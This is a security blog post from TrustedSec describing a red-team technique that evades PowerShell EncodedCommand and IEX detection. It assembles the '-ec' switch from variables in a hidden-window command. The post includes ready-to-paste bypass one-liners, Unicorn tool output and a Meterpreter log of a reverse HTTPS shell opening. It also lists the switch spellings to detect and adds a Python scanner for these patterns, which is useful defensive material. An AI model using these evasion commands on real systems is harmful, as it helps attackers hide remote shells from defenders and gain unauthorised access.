January 25, 2017

Circumventing EncodedCommand and IEX Detection in PowerShell

Written by David Kennedy
PowerShell continues to be one of the hot topics for security conferences and something that is actively being used both for offense and for defense. Defenders are getting smarter when it comes to detecting potentially malicious uses of PowerShell through a number of methods. Many of these methods are used for both legitimate and illegitimate purposes. Methods like Invoke-Expression or IEX are commonly used, almost as much as the EncodedCommand method. EncodedCommand, for those that are not familiar, is a way to execute base64-encoded PowerShell code, which skirts (by design) around the Execution Policies in PowerShell:

powershell -EncodedCommand

There are 15 different iterations to shorthand EncodedCommand which defenders will typically attempt to key off on. One of the least known is "-ec", which is shorthand for "-encodedcommand". Shorthand for encodedcommand that should be added to detection rules:

-e
-ec
-en
-enc
-enco
-encod
-encode
-encoded
-encodedc
-encodedco
-encodedcom
-encodedcomm
-encodedcomma
-encodedcomman
-encodedcommand

Defenders typically try to flag on these and weed out false positives in order to identify encodedcommand traffic through the network, either through tools or through event logs. There are fantastic ways to get around these, for example leveraging Daniel Bohannon's "Invoke-Obfuscation" https://github.com/danielbohannon/Invoke-Obfuscation (super awesome and amazing btw), which will take a .ps1 file for you and mangle it beyond readable with some awesome obfuscation. For attackers though, leaving a ps1 file on disk is often not the desired method, and if we can remain off disk, that is the most desirable method. Dave Kennedy, Shawn Sullivan, Martin Bos, and Ben Ten were recently on a red team exercise where a customer had great detection capabilities around EncodedCommand and application whitelisting that disallowed any PS1 file execution.
In this scenario we needed a way to get around detection and prevention methods within the network. We decided to use the Unicorn method and came up with a new technique for circumventing detection rules moving forward. Unicorn is a tool that TrustedSec developed a long time ago that uses an x86 downgrade attack for shellcode to execute Metasploit shells in memory without touching disk (<3 Matt Graeber #KeepMattHappy). In order to circumvent a -e[.*] regex we needed another method to get around the detection rules. What we needed was something small; especially with Meterpreter Reverse HTTPS the payload can typically be large. Additionally, we wanted it to fit other methods such as PowerShell Empire and Cobalt Strike EncodedCommand payload delivery. What we decided to do was use PowerShell commands and leverage Set-Variable with .value.toString() in order to piece together our -ec switch on the command line. This allows us to specify -ec without ever literally writing -ec, which would be hit by detection rules.
powershell -window hidden -C "set-variable -name "LB" -value "-"; set-variable -name "I" -value "e"; set-variable -name "V" -value "c"; set-variable -name "wP" -value ((get-variable LB).value.toString()+(get-variable I).value.toString()+(get-variable V).value.toString()) ; powershell (get-variable wP).value.toString() 
This can be shortened extensively by using shorthand:
powershell -window hidden -C "sv x -;sv y ec;sv Z ((gv x).value.toString()+(gv y).value.toString());powershell (gv Z).value.toString()"
This assigns variables (with randomized names in Unicorn) and uses (get-variable X).value.toString() to convert their contents back into the string -ec. This allows us to execute EncodedCommand without having to actually use -ec anywhere in our PowerShell command and circumvent detection rules. Unicorn has been updated to version 2.4, which now incorporates this bypass method. An example of the Unicorn output:
root@stronghold:/home/relik/Desktop/git/unicorn# python unicorn.py windows/meterpreter/reverse_https 192.168.5.23 443
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...

Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave

Happy Magic Unicorns.

[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
If you open up the powershell_attack.txt:
powershell -window hidden -C "set-variable -name "C" -value "-"; set-variable -name "s" -value "e"; set-variable -name "q" -value "c"; set-variable -name "P" -value ((get-variable C).value.toString()+(get-variable s).value.toString()+(get-variable q).value.toString()) ; powershell (get-variable P).value.toString() <base64 EncodedCommand payload omitted>"
Now that we have this, we can simply copy and paste this into one command line where we have remote command execution, and get our shell!
[02:14:52] TrustedSec MSF (s:0 j:1) exploit(handler) > 
[*] [2017.01.25-14:22:57] https://192.168.5.23:443 handling request from 192.168.5.44; (UUID: jwtqzcxn) 
Encoded stage with x86/shikata_ga_nai
[*] [2017.01.25-14:22:57] https://192.168.5.23:443 handling request from 192.168.5.44; (UUID: jwtqzcxn) 
Staging x86 payload (958561 bytes) ...
[*] Meterpreter session 1 opened (192.168.5.23:443 -> 192.168.5.44:51094) at 2017-01-25 14:22:58 -0500

[02:14:48] TrustedSec MSF (s:1 j:1) exploit(handler) > 
[02:14:48] TrustedSec MSF (s:1 j:1) exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
This is especially useful for evading detection. For defenders, unfortunately, you need to look at how PowerShell is being used on your network and identify whether .value.toString() is a valid use in your environment. This should also work for anything you're trying to sneak by, including IEX, which is commonly picked up. Example below:
powershell -window hidden -C "set-variable -name "LB" -value "I"; set-variable -name "I" -value "E"; set-variable -name "V" -value "X"; set-variable -name "wP" -value ((get-variable LB).value.toString()+(get-variable I).value.toString()+(get-variable V).value.toString()) ; powershell (get-variable wP).value.toString() ('')"
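As an added defensive example (not code from the post or from Unicorn), the Python below scans process-creation command lines for the three things the post describes: any of the 15 spellings of the EncodedCommand switch, the get-variable/.value.toString() concatenation used to assemble a string, and a nested powershell whose argument is that assembled variable. The sample command lines are constructed and the indicator names are my own.

```python
import re

# Every leading substring of "-EncodedCommand" (down to "-e") is accepted by
# powershell.exe, plus the separate alias "-ec": 15 spellings in total.
ENCODED_SPELLINGS = ["encodedcommand"[:n] for n in range(1, 15)] + ["ec"]
ENCODED_FLAG = re.compile(
    r"(?<![\w-])-(?:" + "|".join(sorted(ENCODED_SPELLINGS, key=len, reverse=True)) + r")(?!\w)",
    re.IGNORECASE,
)
# Pieces pulled out of variables and concatenated into one string, e.g.
#   (gv x).value.toString()+(gv y).value.toString()
VARIABLE_ASSEMBLY = re.compile(
    r"\b(?:get-variable|gv)\b[^)]*\)\s*\.value\.tostring\(\)\s*\+", re.IGNORECASE)
# A nested powershell whose first argument is such an assembled variable.
NESTED_FROM_VARIABLE = re.compile(
    r"\bpowershell(?:\.exe)?\s+\(\s*(?:get-variable|gv)\b[^)]*\)\s*\.value\.tostring\(\)",
    re.IGNORECASE)

def classify(cmdline: str) -> list[str]:
    """Return the names of the indicators that fire on one process command line."""
    hits = []
    if ENCODED_FLAG.search(cmdline):
        hits.append("encodedcommand-flag")
    if VARIABLE_ASSEMBLY.search(cmdline):
        hits.append("variable-string-assembly")
    if NESTED_FROM_VARIABLE.search(cmdline):
        hits.append("nested-powershell-from-variable")
    return hits

# Constructed sample command lines, shaped like what a 4688 / Sysmon Event ID 1
# collector hands over; the last two follow the shapes shown in the post.
SAMPLES = [
    'powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1',
    'powershell -ep bypass -NoProfile -Command Get-Process',
    'powershell -EnCoDeDcOmMaNd QQBBAEEAQQA=',   # constructed blob, not a real payload
    'powershell -window hidden -C "sv x -;sv y ec;sv Z ((gv x).value.toString()+'
    '(gv y).value.toString());powershell (gv Z).value.toString()"',
    'powershell -window hidden -C "set-variable -name "LB" -value "I"; '
    'set-variable -name "I" -value "E"; set-variable -name "V" -value "X"; '
    'set-variable -name "wP" -value ((get-variable LB).value.toString()+'
    '(get-variable I).value.toString()+(get-variable V).value.toString()) ; '
    'powershell (get-variable wP).value.toString() (\'\')"',
]

def scan(cmdlines=SAMPLES) -> dict[str, list[str]]:
    """Map each command line that fires at least one indicator to its indicators."""
    return {c: classify(c) for c in cmdlines if classify(c)}

if __name__ == "__main__":
    for cmd, hits in scan().items():
        print(", ".join(hits), "<-", cmd[:70])
```

The two assembled-string samples never contain a literal -ec, so only the second and third indicators catch them; note that the child powershell process they spawn receives the assembled switch as a normal argument, so its own process-creation command line will show -ec, which makes the parent/child pair another thing to alert on.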
Unicorn version 2.4 is now released. Unicorn will randomize all of the names so you can't trigger off of them. We will be updating the Social-Engineer Toolkit and other methods with this in the next release.

Download Unicorn

Special thanks to TrustedSec consultant Shawn Sullivan for the assist on the string conversion. Special thanks to Walter Legowski for the shorthand version.